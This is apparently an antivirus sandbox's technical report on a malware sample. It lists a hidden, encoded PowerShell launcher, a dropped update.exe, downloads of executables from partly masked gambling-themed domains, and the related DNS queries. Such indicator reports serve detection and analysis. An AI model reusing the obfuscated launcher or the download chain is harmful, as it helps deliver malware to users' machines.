Техническая информация
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -w h -NonI -NoP -noL -enc LgAgACgAIAAkAFAAUwBIAG8ATQBlAFsANABdACsAJABwAFMASABvAG0ARQBbADMANABdACsAJwB4ACcAKQAgACgAIAAoACgAKAAiAHsAMQB9AHsAMwAzAH0AewAxADMAfQB7ADMAMgB9AHsAMwAwAH0AewA5AH0AewA3AH0...
- '%CommonProgramFiles(x86)%\Microsoft Shared\DW\DW20.EXE' -x -s 4040
- %TEMP%\update.exe
- 'ta###nwin.club':443
- 'we#.##nwinvn.vip':443
- 'x1.#.lencr.org':80
- 'b2#.bet':80
- 'b2#.us':443
- 'b2#.gg':443
- 'b2#.casino':443
- 'pl###o88.fun':443
- 'ch##go88.us':443
- http://x1.#.lencr.org/
- http://b2#.bet/SoftwareUpdate.exe
- http://b2#.bet/update.exe
- 'ta###nwin.club':443
- 'we#.##nwinvn.vip':443
- 'b2#.us':443
- 'b2#.gg':443
- 'b2#.casino':443
- 'pl###o88.fun':443
- DNS ASK we#.#unvn.net
- DNS ASK ta###nwin.club
- DNS ASK we#.##nwinvn.vip
- DNS ASK x1.#.lencr.org
- DNS ASK b2#.bet
- DNS ASK b2#.us
- DNS ASK b2#.gg
- DNS ASK b2#.casino
- DNS ASK pl###o88.fun
- DNS ASK ch##go88.us
- ClassName: 'OleMainThreadWndClass' WindowName: ''